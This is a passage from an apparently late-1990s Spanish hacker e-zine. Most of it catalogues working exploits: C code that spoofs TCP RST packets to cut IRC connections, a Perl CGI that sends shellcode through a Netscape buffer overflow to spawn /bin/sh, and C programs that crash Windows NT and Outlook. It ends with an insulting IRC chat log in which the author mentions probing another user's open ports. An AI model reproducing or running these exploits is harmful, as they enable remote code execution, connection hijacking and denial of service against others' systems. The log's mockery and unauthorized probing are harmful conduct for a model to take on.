/* Defaults if neither -l nor -h are specified (common IRC server ports). */
if ((slowport == 0) && (shighport == 0))
{
slowport = 6660;
shighport = 6670;
}
/* End of the options processing code */

vichighport = VICTIM_START_PORT + vicports;
ircport = shighport;
filter_str = set_filter (argv[optind], source, argv[optind + 2]);
victim = host_to_ip (argv[optind]);
server = host_to_ip (argv[optind + 1]);
port = (u_short) atoi (argv[optind + 2]);
sock = set_sockaddr (victim, port);
fd = open_sock ();
psize = sizeof (struct evilpkt);
start_pcap ();
while (1)
{
last_ack = get_ack (victim, saddr, port, fd, sock, delay);
pkt.iphdr.ip_src.s_addr = server;
pkt.iphdr.ip_dst.s_addr = victim;
pkt.iphdr.ip_id = htons (rand () % 7000);
pkt.iphdr.ip_off = 0;
pkt.tcphead.th_flags = TH_RST;
pkt.tcphead.th_win = 0;
pkt.tcphead.th_ack = 0;
pseudo.saddr = server;
pseudo.daddr = victim;
if (ircport >= slowport)
{
pkt.tcphead.th_sport = htons (ircport);
}
else
{
ircport = shighport;
pkt.tcphead.th_sport = htons (ircport);
}
printf ("Setting the source port to %d.\n", ircport);
ircport--;
for (i = 0; i <= highseq; i++)
{
pkt.tcphead.th_seq = htonl (last_ack + i);
bcopy (&pkt.tcphead, &pseudo.faketcp, 20);
for (sp = VICTIM_START_PORT; sp < vichighport; sp++)
{
/* FreeBSD has problems and runs out of buffer space in sendto() unless
we insert a delay here. Unfoprtunately, this makes the code less
effective. */

#ifdef __FreeBSD__
if (!(sp % 20))
{
usleep (20000);
}
#endif
pkt.tcphead.th_dport = htons (sp);
bcopy (&pkt.tcphead.th_dport, &pseudo.faketcp.th_dport, 2);
pkt.iphdr.ip_id = htons (0x29a + (u_short) rand () % 7000);
pkt.iphdr.ip_sum = 0;
pkt.iphdr.ip_sum = htons (tcp_cksum ((u_short *) & pkt.iphdr, 20));
pseudo.faketcp.th_sum = 0;
pkt.tcphead.th_sum = tcp_cksum ((u_short *) & pseudo, 32);
if (sendto (fd, (const void *) &pkt, psize, 0, (const struct sockaddr *) sock, sizeof (struct sockaddr)) < 0)
{
perror ("sendto(): ");
close (fd);
exit (-1);
}
}
}
}
if (close (fd) == -1)
{
perror ("close()");
exit (-1);
}
return (0);
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Netscape en x86 Linux
Objetivo: Buffer overflow
Parche: Cuidado con lo que ves
Creditos: Mr. Nothing <nothing@shout.net>
Descripcion: El buffer overflow puede ser activado remotamente por el CGI.
Codigo:
#!/usr/bin/perl
#
# buffer-overflow-1.cgi -- Dan Brumleve, 1998.10.19

sub parse {
join("", map { /^[0-9A-Fa-f]{2}$/ ? pack("c", hex($_)) : "" } @_);
}

# This is very tricky business. Netscape maps unprintable characters
# (0x80 - 0x90 and probably others) to 0x3f ("?"), so the machine
# code must be free of these characters. This makes it impossible
# to call int 0x80, so I put int 0x40 there and wrote code to
# shift those bytes left before it gets called. Also null characters
# can't be used because of C string conventions.

# the first paragraph of the following turns the int 0x40 in the second
# paragraph into int 0x80. the second paragraph nullifies the SIGALRM
# handler.

my $pre = parse qw{
31 c0 # xorl %eax,%eax
66 b8 ff 0f # movw $0x1056,%ax
01 c4 # addl %eax,%esp
c0 24 24 01 # shlb $1,(%esp)
29 c4 # subl %eax,%esp

31 c0 b0 30
31 db b3 0e
31 c9 b1 01
cd 40
};

my $code = $pre . parse qw{
b0 55 # movb $0x55,%al (marker)
eb 58 # (jump below)

5e # popl %esi

56 # pushl %esi
5b # popl %ebx
43 43 43 43 43 43
43 43 43 43 43 # addl $0xb,%ebx

21 33 # andl %esi,(%ebx)
09 33 # orl %esi,(%ebx)

31 c0 # xorl %eax,%eax
66 b8 56 10 # movw $0x1056,%ax
01 c4 # addl %eax,%esp
c0 24 24 01 # shlb $1,(%esp)
33 c0 # xorl %eax,%eax
b0 05 # movb $5,%al
01 c4 # addl %eax,%esp
c0 24 24 01 # shlb $1,(%esp)
29 c4 # subl %eax,%esp
66 b8 56 10 # movw $0x1056,%ax
29 c4 # subl %eax,%esp


31 d2 # xorl %edx,%edx
21 56 07 # andl %edx,0x7(%esi)
21 56 0f # andl %edx,0xf(%esi)
b8 1b 56 34 12 # movl $0x1234561b,%eax
35 10 56 34 12 # xorl $0x12345610,%eax

21 d9 # andl %ebx,%ecx
09 d9 # orl %ebx,%ecx

4b 4b 4b 4b 4b 4b
4b 4b 4b 4b 4b # subl $0xb,%ebx

cd 40 # int $0x80
31 c0 # xorl %eax,%eax
40 # incl %eax
cd 40 # int $0x80


e8 a3 ff ff ff # (call above)
};

$code .= "/bin/sh";

my $transmission = parse qw{
6f 63 65 61 6e 20 64 65 73 65 72 74 20 69 72 6f 6e # inguz
20 66 65 72 74 69 6c 69 7a 61 74 69 6f 6e 20 70 68 # inguz
79 74 6f 70 6c 61 6e 6b 74 6f 6e 20 62 6c 6f 6f 6d # inguz
20 67 61 74 65 73 20 73 6f 76 65 72 65 69 67 6e 74 # inguz
79
};

my $nop = "\x90"; # this actually gets mapped onto 0x3f, but it doesn't seem
# to matter

my $address = "\x10\xdb\xff\xbf"; # wild guess, intended to be somewhere
# in the chunk of nops. works on every
# linux box i've tried it on so far.


my $len = 0x1000 - length($pre);
my $exploit = ($nop x 1138) . ($address x 3) . ($nop x $len) . $code;
# the first $address is in the string replaces another
# pointer in the same function which gets dereferenced
# after the buffer is overflowed. there must be a valid
# address there or it will segfault early.

print <<EOF;
Content-type: text/html

<!-- $transmission -->
<embed type="$exploit" src="data:x">
EOF
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Windows NT
Objetivo: Crash Nt
Parche: Aun se lo estan pensando
Creditos: fill <fill@TCHERCOM.RU>
Descripcion: Este programa resetea un Nt con SP4 RC
Codigo:
#include <windows.h>

int WINAPI WinMain(HINSTANCE hinstExe,
HINSTANCE hinstPrev, LPSTR lpszCmdLine,
int nCmdShow)
{
HMENU hMenu = CreatePopupMenu();
HMENU hMenu1 = CreatePopupMenu();
AppendMenu(hMenu1,MF_STRING, 1, "1");
AppendMenu(hMenu1,MF_STRING, 2, "2");
AppendMenu(hMenu1,MF_STRING, 3, "3");
InsertMenu(hMenu,1,MF_POPUP|MF_STRING,(UINT)hMenu1,"1");
InsertMenu(hMenu,2,MF_POPUP|MF_STRING,(UINT)hMenu1,"2");
InsertMenu(hMenu,3,MF_POPUP|MF_STRING,(UINT)hMenu1,"3");
InsertMenu(hMenu,4,MF_POPUP|MF_STRING,(UINT)hMenu1,"4");
InsertMenu(hMenu,5,MF_POPUP|MF_STRING,(UINT)hMenu1,"5");
InsertMenu(hMenu,6,MF_POPUP|MF_STRING,(UINT)hMenu1,"6");
return 0;
}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Internet Explorer 4
Objetivo: Fallo de seguridad, obtener ficheros de un navegador.
Parche: http://www.microsoft.com/security/bulletins/ms98-015.asp
Para los que no tengan el parche:

a) Activar el aviso para cuando se transmiten formularios no
cifrados, ya que indicaria al usuario que se pretende enviar un
fichero.

b) Desactivar la ejecucion de guiones para la zona de seguridad
de Internet.

Ambas opciones se pueden configurar en Edicion --> Opciones de
Internet --> Seguridad --> Configuracion... La primera de ellas,
en "Miscelanea", desactivando la opcion "Enviar los datos no
encriptados del formulario"
. La segunda, en "Automatizacion",
desactivando la opcion "Automatizacion activa".
Creditos: Juan Carlos Garcia Cuartango <cuartangojc@mx3.redestb.es>
Descripcion: Pues eso que este fallo se aprovecha de la manera en que IE
gestiona las operaciones de cortar y pegar a traves de guiones.
El agujero permite a un atacante pegar el nombre de un fichero
en el control de carga de ficheros (control que teoricamente solo
el usuario esta autorizado a rellenar manualmente) para posterior
mente enviarselo de vuelta al atacante.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Microsoft Outlook
Objetivo: Denial Of Service
Parche: EL mismo que el de Cuartango
Creditos: rockme@altern.org
Descripcion: Cuando Microsoft Outlook lee el subject de un e-mail lo aloja
con un tama¤o de aproximadamente 5000 caracteres y no comprueba
el tama¤o del subject recibido.
Este programa hace que windows se estrelle. Es posible ejecutar
comandos, solo debes modificar el codigo.
Codigo:
#include <stdio.h>
#include <strings.h>
#include <errno.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

struct in_addr
resolv(char *name)
{
static struct in_addr in;
unsigned long l;
struct hostent *ent;

if((l = inet_addr (name)) != INADDR_NONE)
{
in.s_addr = l;
return in;
}
if(!(ent = gethostbyname (name)))
{
in.s_addr = INADDR_NONE;
return in;
}
return *(struct in_addr *) ent->h_addr;
}


char buf[70000];
char server[5000];
char mailfrom[5000];
char rcptto[5000];


main (int argc, char *argv[])
{
struct sockaddr_in addr;
int i, s;
char c;
int port=25;


if(argc < 3){
printf("\n Usage : %s mail_server sender recipient \n\n", argv[0]);
printf(" Warning this program do not spoof your IP adress !\n\n");
exit(0);
}

if(strlen(argv[1]) > 4990){
printf("Sorry mailserver is too big .\n");
exit(0);
}

if(strlen(argv[2]) > 4990){
printf("Sorry sender is too big .\n");
exit(0);
}

if(strlen(argv[3]) > 4990){
printf("Sorry recipient is too big .\n");
exit(0);
}

/* Mwarf, my program is protected from buffer overflow attacks :) */

printf("\nRockme Security Research Laboratory !\n\n\n");
printf("Microsoft Outlook Denial of Service !\n");
printf("Veuillez patienter environ 20 secondes suivant la vitesse du serveur ...\n");

sprintf(server, "HELO %s\n", argv[1]);
sprintf(mailfrom, "MAIL FROM: %s\n", argv[2]);
sprintf(rcptto, "RCPT TO: %s\n", argv[3]);

s = socket(AF_INET, SOCK_STREAM, 0);
addr.sin_family = AF_INET;
addr.sin_addr = resolv(argv[1]);
addr.sin_port = htons(port);
connect(s, (struct sockaddr *) &addr, sizeof (addr));

write(s, server, strlen(server));
sleep(1);

write(s, mailfrom, strlen(mailfrom));
sleep(1);

write(s, rcptto, strlen(rcptto));
sleep(1);

write(s, "data\n", 5);
sleep(1);

write(s, "Subject : ", 10);
sleep(1);

for(i = 1; i < 7000; i++){
write(s, "X", 1);
}
sleep(3);

write(s, "\n", 1);
sleep(1);

write(s, "bonjour\n", 8);
sleep(1);

write(s, ".\n", 2);
sleep(1);

write(s, "quit\n", 5);
sleep(1);

read(s, buf, 69000); /* read (s, &c, 1); */
printf("%s", buf);

printf("\n");

}
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-


S.O/Programa: Cisco routers
Objetivo: Buffer overflow
Parche: Pendiente de salir
Creditos: -
Descripcion: Al crearse un desbordamiento de buffer, los fragmentos de texto
escritos antes por los usuarios se pueden conocer, ironicamente
los sitios con una buena politica de contrase¤as son los mas
vulnerables, ya que si obligan a cambiar cada poco las claves
de sus usuarios, es mas probable que en estos fragmentos podrian
encontrarse contrase¤as. No se necesita tener una cuenta solo
conectarse al dispositivo adecuado y escribir la sucesion
apropiada de caracteres.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-

S.O/Programa: Remailer de iname.com
Objetivo: Saber la direccion del redireccionamiento
Parche: Respuesta de iname.com:
We are currently aware of the problem you experienced and are
currently working to resolve it. The "user-unknown" bounces your
senders have experienced appear to be sporadic. Our Technology
team is currently working to address this issue. We sincerely
apologize for the inconvenience caused by this problem.
Creditos: Senpai <senpai@cyberdude.com>
Descripcion: El fallo descubierto por Senpai, miembro de RareGazZ permite
averiguar la direccion a donde se realiza el forward, puede
llegar a descubrirse la direccion original (a donde redirecciona
si se le envia un mail a su remailer e iname no puede acceder a
acceder a la direccion que aparece en el forward de iname
devuelve el mail al que lo envio, pero con un peque¤o fallo,
indica cual es la direccion a la que no pudo acceder.
Codigo: -
-*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*--*-


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
oOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoOoO
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Ä[ Historias del IRC (segunda parte) - GuyBrush ]ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Algunos os preguntareis ... porque es la segunda parte? donde esta la primera?
La pimera parte de esta cruda realidad la teneis en el numero 16 de SET ...

Un buen dia andaba yo por el IRC chateando con algunos amigos en canales no de
hack cuando pense en darme una vuelta por #hackers a ver que se cocia por alli.
Asi que le pedi a mi amigo ufo la contrase¤a y entre a dotorear un poco. Cual
fue mi sorpresa cuando, a pesar de que usaba otro nick, se enteraron de quien
era ... logicamente, se lo dijo ufo porque con lo paleto que es nuestro
protagonista de hoy ...

Pues aqui teneis casi todo el log. Podeis sacar vuestras propias conclusiones
... (por cierto, mi nick era q1234)

Session Start: Mon Nov 23 00:22:13 1998
*** Now talking in #hackers
*** Topic is '[~AZZ~] -> Ahora seras auto opeado cuando entres por mi rekto.'
*** Set by Nardo on Mon Nov 23 00:13:06
*** ufo sets mode: +oo q1234 LoLo
<Cuasl> q1234 tu eres GuyBrush?
<q1234> thx por decirlo en el canal
<Cuasl> q1234 por?
<Cuasl> q1234 no kieres ke se enteren de lo lamer ke eres?
<l0b0> :????????
<q1234> quieres pelea ? pues buscate a otro ...
<Cuasl> q1234 pelea? yohe dishopelea?
<jla> ?¿
<jIa> q1234: porke no te largas enpanao?

[ Comentario: Que conversacion tan interesante !!! cuanta cultura !!!
que cosas que se aprenden en el IRC !!! ]

<MuErTe> ?
<jla> joe cuasi
<ufo> JLA
<ufo> jla
<jla> tu?
<ufo> shhh
- entra ufete (2ufo@rs161.readysoft.es4)
- Clones (ufo, ufete )6 rs161.readysoft.es 4[124]
*** MuErTe sets mode: +o ufete
- sale ufete 2(4ufo@rs161.readysoft.es2)
<jla> almenos dejadme dicirlo ami
<ufo> el que?
<jla> lo que he dicho antes
<ufo> que has dixo antes?
<LoLo> wenn
<jla> io que se esto habla solo i to :)
<jIa> aparte de ke he disho ke se largue el empanao del GuyBrush
<jIa> nada mas
*** ufo is now known as ud
*** ud has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-)
<jla> sera el megahal que ia habra aprndido a rajar el solo
<q1234> largate tu gilipollas
- entra - ufo -(ufo@rs161.readysoft.es)
<q1234> que co¤o te he hecho yo?
<jla> q1234 con el tiempo

  
te daras cuenta de que todo es relativo mas aqui
<q1234> de que me hablas?
<jIa> akaso el ke seas feo no es una buena razon pa ke te largues?
<q1234> dime antes que te hecho?
<ufo> llevas aqui un par de dias y ya tas hechando gente?
<ufo> esperate un pokito no?
<jIa> no hecho a nadie , solo insulto a los lamers komo el Guy.
<ufo> lamers?
<ufo> el Guy lleva aqui mas de un a¤o...

[ pero ufo ... como le hablas de numeros al chaval? si no sabe
contar!!! ]

<jla> joe me dijeron que el linux erea mu inteligente peor no pense que tanto
<jla> jia
<jIa> q1234, peaso nick chorras ke tas puesto no? digno de anormales :P

[ anda que el tuyo ... (que es MuErTe, como vereis despues) ]

<jla> jIa
<jla> joder entodavia me haceis cambiar de nick
<Cuasl> veiz
<q1234> muerte ... da la cara

[ Dios mio !!!! cuanto sabe el tal MuErTe apestosa ese !!! si es capaz
de meter dos clones y ponerles nombres parecidos a los del resto de
usuarios !!! que gran jacker !!! de mayor quiero ser como el ... y
lo que mas me impresiona es su nick ... impresionante ]

<Cuasl> jeje
<Cuasl> en linux se nota mas
<MuErTe> xDD
<Cuasl> pero en win no se nota na
<MuErTe> anda kas tardao melon
<MuErTe> xD
<Hackelin> valla oztia
<Cuasl> ke va muerte
<Cuasl> ezke no me daba kuenta
<MuErTe> tu no sunn
<MuErTe> xD
<Cuasl> de verdad ke ni me enterao
<MuErTe> el Guy
<Cuasl> ahh
*** ufo sets mode: +n
<MuErTe> xD
<Cuasl> ya
<Cuasl> XDD
<Cuasl> fale
*** Cuasl is now known as sunn
<sunn> ya
<sunn> :)
<sunn> XDDDDDDDD
*** ufo has quit IRC (-=|=- No tomes drogas.....usa tu propia quimika...-=|=-)
<sunn> jeje
<MuErTe> .
<sunn> . ?
<sunn> :P
<sunn> paso un angel................................................
<sunn> X)
<sunn> paso un ciclo..............................................

[ no!!! era un burro volando!!! ]

<sunn> mejor dicho
<sunn> XDDDD
<sunn> XD
<sunn> jeje
*** Atic sets mode: +o Hackelin
*** MuErTe changes topic to 'http://www.ufoplanet.org/rc5  << See Now!!'
<Atic> ui si esta HAckelin de la Vega !
<Atic> :*
<Atic> xD
<jla> joder
<sunn> MuErTe: el topic ese me va a volver lokorrrrr !!!!!
<sunn> xD
<MuErTe> xD
<sunn> jeje
<MuErTe> /clear
<MuErTe> xD
<sunn> raya ke no veas
<sunn> ya
<sunn> :P
<sunn> jeje
<MuErTe> si kieres lo pongo verde fosforito
<MuErTe> xD
<sunn> sip
<sunn> mola maz
<sunn> jeje
<sunn> XD
<MuErTe> xD
<MuErTe> pso a la prosima
<MuErTe> xD
<sunn> oka
<sunn> :)
<MuErTe> kara tendria ke modifiskar el script
<MuErTe> y me da un palo del kopon
<MuErTe> xD
<sunn> aha
<jla> script
<MuErTe> mejor mato el tiempo leyendo los fabulosos Tectos de Seguridad
informatica de PcActual
<sunn> avé si me lo rlz
<sunn> jeje
<jla> ummm
<sunn> los de Linux Actual rlz more
<sunn> :)
<MuErTe> nonononon
<MuErTe> PC Actual
<MuErTe> xD
<MuErTe> mola mas
<MuErTe> xD
<sunn> guenonp
<sunn> x)
*** MuErTe sets mode: +o jla
<MuErTe> xD
<AciD-KrS> xDDD
<MuErTe> sobretodo los testosto der guy
<MuErTe> xD
<MuErTe> sobretodo los testos der guy
<MuErTe> xD
<sunn> jeje
<jla> agg dejemoslo
<MuErTe> me tronsho kuando los leo
<MuErTe> xD

[ los lees ????? un 31337 como tu ??? no jodas!!!! que honor!!!! ...
pense que solo leias el tele-indiscreta ... ]

<sunn> en la de este mez ?
<MuErTe> no sep
<MuErTe> este mes no lu tengo

[ no 'lu' tienes? ]

<sunn> oka
<MuErTe> xD
- entra LoLo (2~LoLo@195.77.49.604)
*** \W3nd|g0 sets mode: +o LoLo
<LoLo> res
<LoLo> th
<LoLo> thx
<MuErTe> xD
<MuErTe> se lolo kampeon
<MuErTe> xD
<LoLo> -\W3nd|g0(IRcap.3@195.235.64.57)- Hola LoLo Bienvenido al canal.
<LoLo> te creia mas formal
<LoLo> xD
<LoLo> [Nov 22 23:05:55 GMT] 5 RC5 blocks are in file buff-out.rc5
<MuErTe> muahua+
<MuErTe> xD
<LoLo> campion , campion
<LoLo> : P
<MuErTe> xDD
<MuErTe> HIP. HIP HURRA!!!!! par 75 der LoLO!!
<MuErTe> ke ya pronto llega a los 1000!!
*** AciD-KrS has quit IRC (samba Rlz!!!!!!!!)
<LoLo> 75?
<LoLo> komor?
<MuErTe> HIP. HIP HURRA!!!!! par P - 75 der LoLO!!
<LoLo> aaaaaaaapz
<LoLo> XDDDDDD
<MuErTe> xDD
<LoLo> na, si hoi he mandao 68 blokes
<LoLo> : P
<LoLo> i tu puta, a ver si kompartes SGI XD
<MuErTe> juer
<MuErTe> xD
<MuErTe> muahua
<MuErTe> xd
<MuErTe> si no tengu
<MuErTe> 3 pedaso de shell ke tenia

[ que tipico ... ]

<MuErTe> ya se man jorobau

[ repito ... QUE TIPICO ... ]

<MuErTe> xD
<MuErTe> normal
<MuErTe> use los maravillosos testor der Guy , pa arreglarles la mashine
<MuErTe> y han akabau metiendo win3.11

[ se ve que en el parbulario no le ense¤an bien .... neeeeeene que no
se dice mashine, que es maquina y acabado ... no akabau .. si es que
nunca aprendera ... ]

<\W3nd|g0> ?
<\W3nd|g0> k hoy to dios se mete kon el Guy u k?
<\W3nd|g0> XDDDDDDDDDDDD

[ el 'guy' esta echando un vistazo por la maquina del Mofeta, digo,
muerte ... anda!!! cuanto puerto abierto!!!! si no me caben por
pantalla!!! jejejeje ... la gente piensa que usar linux es meterle
el Bitchx y conectarse al IRC ... si es que nunca aprendera ...
A ver a ver .... puerto 113, 21, 23 ... interesante ... echemos un
vistazo a ese puerto 21 que lo veo un poco mal ... ]

<MuErTe> xDDD
<MuErTe> otro ke no sa koskao
<MuErTe> xD
<MuErTe> wendi
<MuErTe> xD
<MuErTe> kes el jIa y el Cuasl era yor
<MuErTe> xD

[ XDDDD que divertido!!!! como mola hacer el gilipollas!!! ale a
regalar dinero a telefonica (o como diria el ... tim0f0nic@)
haciendo el imbecil ]

<jla> jla jIa joe con las x no se notaba...
<MuErTe> yap
<MuErTe> kon los Güin tmpk se nota

[ habra que plantearse el escribir algun articulo sobre como cambiar
las 'l' por 'i' o por '1' para insultar a la gente sin dar la cara
... es lo mas!!! dominando eso y con una @ ... 31337 seguro!! ]

<jla> que kpullo XDD
<sunn> MuErTe: el bitchx tiene algun hole cuando ta rlz en x ?
<MuErTe> kapuIIo?
<MuErTe> ein?
<MuErTe> traduseme illor , ke yo no tengo er nivel del Guy

[ desde luego que no ... mas quisieras ... pues mira, lo que quiere
decirte es que conectarte al IRC con el Bitchx desde las X de linux
no es seguro (me sigues?) ... y menos si te conectas como
superusuario (Mmmmm seguro que te has perdido ...) ]

<MuErTe> y no se kosas desas

[ lo se ... todo lo que no sea IRC, Clon, Ban o Kick ... ni idea,
verdad? ]

<jla> eh mande!
- entra inf (2nACK-Ack@ppp145.198.redestb.es4)
<LoLo> nas inf
<inf> joer
*** LoLo sets mode: +o inf
<inf> lap
<q1234> desde luego ... tu, todo lo que no sea IRC ... ni puta idea
<inf> a ver...
<sunn> el cliente de irc denominado BitchX tiene algun fallo en su integridad mientras este esta arrankado (ejecutandose) desde el entorno grafico denominado Xwindows ??????????????
<MuErTe> pff
<MuErTe> xD
<sunn> XDDD
<sunn> ya ??
<inf> ande poneis la key q argun dia me voy a vorve loko
<sunn> XDDDDD
<inf> :?
<inf> MUERRRRRRRRRTTTTTT
<inf> XDDD
<MuErTe> inffffff :))
<MuErTe> dios
<MuErTe> kuanto tiemporl
<sunn> jejejejeje
<MuErTe> xDD
<inf> mecagentoo

[ se me saltan las lagrimas ... ]

<sunn> MuErTe: ya ?
<MuErTe> pos sunn
<MuErTe> ke yo sepa, aparte de ke en una Xterm lo veras del kulo, ninguno
<inf> [ MuErTe: ] como tamos ?
<MuErTe> metete una ansi-xterm

[ donde habra aprendido ese vocabulario? guau!!! lo que yo te diga ..
31337 al 100 por 100 !!! ]

<MuErTe> y se arreglara un plin
<MuErTe> inf : bien :)
<MuErTe> y tu ke?
<sunn> faler torpedor
<sunn> :P
<jla> reboot
<MuErTe> bye jIa
<MuErTe> xD
<jla> joe
<jla> /quit
*** jla has quit IRC (BitchX-74p4+Deb1an -- just do it.)
<sunn> ke alguien me hhaga un whois y lo pege
<sunn> plisssss
<MuErTe> yo eske vakas no me interesaban
<MuErTe> xD
<MuErTe> los pobres semos asin

[ chaval tu no eres pobre ... eres analfabeto ... ]

<MuErTe> xD
<LoLo> | channels : @#opers @#pepe #seguridad_informatica @#hackers
<sunn> jejeje
<sunn> joje
<sunn> joe
<MuErTe> ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä
<MuErTe> º sunn (~sunn@ig-254.arrakis.es) [spain]
<MuErTe> º (ircname) -=B0rN 70 B3 4W4y=-
<MuErTe> º (channels) @#opers @#pepe #seguridad_informatica @#hackers
<MuErTe> º (server) pleyades.irc-hispano.org - Arrakis IRC Server
<MuErTe> ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄ Ä
<sunn> el fake join no rlz good pal linux
<sunn> jeje
<sunn> pero pa win yep
<sunn> guenop
<sunn> na
<sunn> thx ppl
<sunn> :)
<inf> una preg...
<inf> q coño hase #hackers con -s ¿?

[ joder !!!! que fallo!!!! como si no se conociera el canal ... para
ponerlo secreto!!! ]

<MuErTe> er fake version mola
<MuErTe> xD
<MuErTe> tenes rason inf
<MuErTe> xD
<inf> otia
<inf> #seguridad_informatica
*** MuErTe sets mode: +s
<MuErTe> sip
<MuErTe> er mashine kanal der guy
<MuErTe> xD
<sunn> jeje
<MuErTe> alli saprende munsho

[ desde luego, mas que en este canal si que se aprende, aunque claro,
tu de seguridad, ni puta idea ... tu solo hack ... e IRC!!! que no
se me olvide ... ]

<MuErTe> xD
<sunn> x)
<MuErTe> vaya..
<MuErTe> komo aki
*** Atic has quit IRC (Ping timeout for Atic[ctv21225131172.ctv.es])
<MuErTe> xD
<sunn> gueno ppl
<sunn> iop xapo
<MuErTe> eske inf
<MuErTe> ayer y antes de ayer
<MuErTe> no se el porke
<sunn> noz vemoz
<MuErTe> estaba -k tambien
<MuErTe> byez sunn
*** sunn has quit IRC (By3x 4ll)
<inf> jurl
<MuErTe> no se kien pollas lo toka

[ no sabes quien pollas lo toca, o quien te toca la polla? ¨?¨?¨? ]

<MuErTe> alomejor era un makrokonsejo der guy
<MuErTe> vete a saber
- entra - Atic (2HG@ctv21225131009.ctv.es4)
*** MuErTe sets mode: +o Atic
- entra - cheme (2~chmegochy@ctv2234.ctv.es4)
- Clones -( cheme , EMF ctv2234.ctv.es ]
<MuErTe> 7op copito
*** MuErTe sets mode: +o cheme
<MuErTe> xD
<cheme> thz :)
<inf> weno..., arguien sabe como le va al 'iruxete?
<MuErTe> xDDD
<MuErTe> pos yo me voin a ir yap

[ que vas a aprender a escribir mejor? ... lo necesitas ... y de paso,
cambiate de nick ... por cierto, tal y como pense, ese puerto 21
tiene algunos fallos de configuracion ... pero como tu no vas por
#seguridad_informatica porque eso no es c00l ... sigue asi chaval ]

<ufo> si tio
<ufo> porlo que veo
<ufo> ya no sigues el horario
<ufo> XDDDDDDDD
<MuErTe> xDD
<MuErTe> si lo sigoo
<MuErTe> xD
<MuErTe> weno
<MuErTe> en parte
<MuErTe> pasa ke maniana no kurro por la mañana

[ no abre el club? si es lunes ... ]

<MuErTe> tengo ke ir ar medikor

[ ahhh, claro!!! otra vez te dio el ataque ... te tengo dicho que
tanto hackear no es bueno ... si es que ser 31337 es muy duro ... ]

<ufo> XD
<ufo> ya tan detectau la enfermedad?
<ufo> XD
<ufo> ya era hora
<inf> [ MuErTe: ] diras al lokero
<MuErTe> aunek tengu ke levantarme a las 7
<ufo> ya se notaba mazo
<inf> [ MuErTe: ] q te pasa?
<MuErTe> toin malito :(

[ lo tuyo no tiene remedio ... eres gilipollas :) ]

<MuErTe> xD
<ufo> pos tendra pikores en la polla.....como siempre
<MuErTe> mañana me lo diran
*** Atic sets mode: +o NunotReeZ
- ThE_RaY (2bbb@ctv21225131038.ctv.es4)
*** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones)
<ThE_RaY> hy!
<MuErTe> me tienes ke haser 3 ekografias

[ y ahora viene lo mas divertido ... ]

*** ufo sets mode: -b *!*@ctv2234.ctv.es
*** Atic sets mode: -b *!*@ctv2234.ctv.es
- entra NunotReeZ (2~cyber10@ctv2234.ctv.es4)
- Clones (cheme , EMF , NunotReeZ ) ctv2234.ctv.es 4[134]
*** \W3nd|g0 sets mode: +b *!*@ctv2234.ctv.es
*** Atic sets mode: +oo cheme EMF
<MuErTe> lso riñones y la bufeta
*** cheme was kicked by LoLo (Banned)
*** EMF was kicked by LoLo (Banned)
*** ufo sets mode: -b *!*@ctv2234.ctv.es
*** Atic sets mode: +o NunotReeZ
*** NunotReeZ was kicked by \W3nd|g0 (4demasiados clones)
- entra NunotReeZ (2~cyber10@ctv2234.ctv.es4)
<inf> [ MuErTe: ] tas preñao ?
*** ufo sets mode: -ooo inf Hackelin Atic
*** ufo sets mode: -oooo q1234 MuErTe LoLo l0b0
*** ufo sets mode: -o \W3nd|g0
- entra EMF (2~emf@ctv2234.ctv.es4)
- Clones (2 EMF ,2 NunotReeZ ) ctv2234.ctv.es 4[124]
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<NunotReeZ> kagondios
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<Atic> xD
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<inf> [ MuErTe: ] tas preñao ?
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<EMF> lalalalallaaaaaaaaaaaaaaaaaaaaaa
<NunotReeZ> panda lamers
*** ufo sets mode: +oooo inf Hackelin EMF Atic
- sale Atic (4HG@ctv21225131009.ctv.es2)
*** ufo sets mode: +oooo NunotReeZ MuErTe LoLo l0b0
*** ufo sets mode: +oo ThE_RaY q1234
<EMF> X'''''''DDDDDDDDDDDDDDd
<NunotReeZ> X)
- entra Atic (2HG@ctv21225131009.ctv.es4)
*** ufo sets mode: +o Atic
*** EMF sets mode: +v \W3nd|g0
<MuErTe> ?
<EMF> :P
<NunotReeZ> Unable to connect to finger address
<NunotReeZ> kagondios
*** Atic sets mode: -oooo EMF Hackelin inf l0b0
